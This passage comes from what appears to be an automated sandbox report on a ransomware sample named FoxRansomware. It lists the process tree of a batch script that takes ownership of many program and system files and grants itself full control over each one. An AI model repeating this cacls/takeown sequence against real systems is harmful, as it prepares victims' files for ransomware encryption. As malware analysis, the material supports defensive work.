  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:2080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:3252
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:3248
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  PID:3292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    PID:1236
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      PID:4124
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  PID:2520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      PID:4116
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:3620
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:4000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:2264
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:3652
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:3776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "device.png" -nobanner
    3⤵
    PID:3404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1664
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4200
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:356
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:4412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:4792
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:4400
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3396
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4484
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:4664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4748
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4844
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:4832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    - Modifies file permissions
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      PID:4836
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:4916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:4492
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:4540
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:4976
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:4512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    - Modifies file permissions
    PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:5032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    - Modifies file permissions
    PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:4560
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:5096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:3408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:5108
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    - Modifies file permissions
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:348
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:3808
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:4872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:2752
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:3444
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:2736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:3004
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:2404
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:2356
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:3152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    - Modifies file permissions
    PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:2588
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:2776
- - C:\Windows\SysWOW64\cacls.exe
